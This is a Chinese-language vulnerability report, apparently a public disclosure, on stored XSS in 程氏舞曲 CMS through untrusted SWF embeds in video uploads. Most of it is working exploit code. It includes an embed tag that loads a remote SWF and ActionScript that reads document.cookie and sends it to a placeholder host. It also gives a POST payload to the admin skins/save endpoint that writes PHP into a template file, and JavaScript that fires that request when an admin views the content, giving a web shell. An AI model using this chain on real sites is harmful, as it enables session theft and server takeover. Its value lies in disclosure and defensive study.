程氏舞曲CMS储存型 xss（5）

### 简要描述： rt，swf啊。。 ### 详细说明： 上传视频处 。对于外部swf文件 过分信任 [<img src="https://images.seebug.org/upload/201406/0621524231425833140e83b2dc5fcdb9fc0993ba.jpg" alt="c1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/0621524231425833140e83b2dc5fcdb9fc0993ba.jpg) 可插入 如下代码 <embed src=http://xxx.xxx/xss.swf type="application/x-shockwave-flash" allowfullscreen="true" allownetworking="all" allowscriptaccess="always"> 构造 恶意的 swf 执行 js 像这样 alert [<img src="https://images.seebug.org/upload/201406/062155455f9b56cc7fe14d06dddf5218a004f63f.jpg" alt="c2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/062155455f9b56cc7fe14d06dddf5218a004f63f.jpg) [<img src="https://images.seebug.org/upload/201406/06215554fd88a72dd3429292de9560b3b30471bf.jpg" alt="c3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/06215554fd88a72dd3429292de9560b3b30471bf.jpg) 这是 获取cookie的swf代码 ``` package { import flash.external.ExternalInterface; import flash.display.Sprite; import flash.display.Sprite; import flash.events.Event; import flash.net.URLLoader; import flash.net.URLRequest; import flash.text.TextField; import flash.text.TextFieldAutoSize; import flash.xml.*; import flash.events.IOErrorEvent; import flash.events.*; import flash.net.*; /** * @author User */ public class csrf extends Sprite { private var loader:URLLoader; public function csrf() { var res:String = ExternalInterface.call("function(){return document.cookie;}"); doGet(res); } private function doGet(res:String):void{ loader = new URLLoader(); var target:String = "http://xxx/xxx.php?get="+res; var request:URLRequest = new URLRequest(target); try { loader.load(request); } catch (error:Error) { sendDatatoJS("Error: " + error.getStackTrace()); } } private function sendDatatoJS(data:String):void{ trace(data); ExternalInterface.call("console.log", data); } } } ``` 后台可以getshell http://localhost/index.php/admin/skins/save post如下数据 ``` path=.%2Fskins%2Findex%2Fdefault%2Fhtml%2Fcs-404.php&CS_Name=cs-404&CS_Neir=<?php phpinfo();?>&Submit=+%E4%BF%AE%E6%94%B9+ ``` getshell [<img src="https://images.seebug.org/upload/201406/06220016d3d35306e4845759c7cb60b68958d344.jpg" alt="c4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/06220016d3d35306e4845759c7cb60b68958d344.jpg) 我们 可以 swf加载个 远程js js代码为 ``` var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); if(request.overrideMimeType) { request.overrideMimeType('text/xml'); } } else if (window.ActiveXObject) { var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; for(var i=0; i<versions.length; i++) { try { request = new ActiveXObject(versions); } catch(e) {} } } xmlhttp=request; url = "http://xxx.com/index.php/admin/skins/save"; var params ='path=.%2Fskins%2Findex%2Fdefault%2Fhtml%2Fcs-404.php&CS_Name=cs-404&CS_Neir=<?php phpinfo();?>&Submit=+%E4%BF%AE%E6%94%B9+'; xmlhttp.open("POST", url, true); xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xmlhttp.setRequestHeader("Content-length", params.length); xmlhttp.setRequestHeader("Connection", "Keep-Alive"); xmlhttp.setRequestHeader("Accept", "text/html,application/xhtm+xml,application/xml;q=0.9,*/*;q=0.8"); xmlhttp.withCredentials = "true"; xmlhttp.send(params); ``` cors是可以跨域传输数据的。从而 后台审核视频文章时 getshell ### 漏洞证明： 如上所述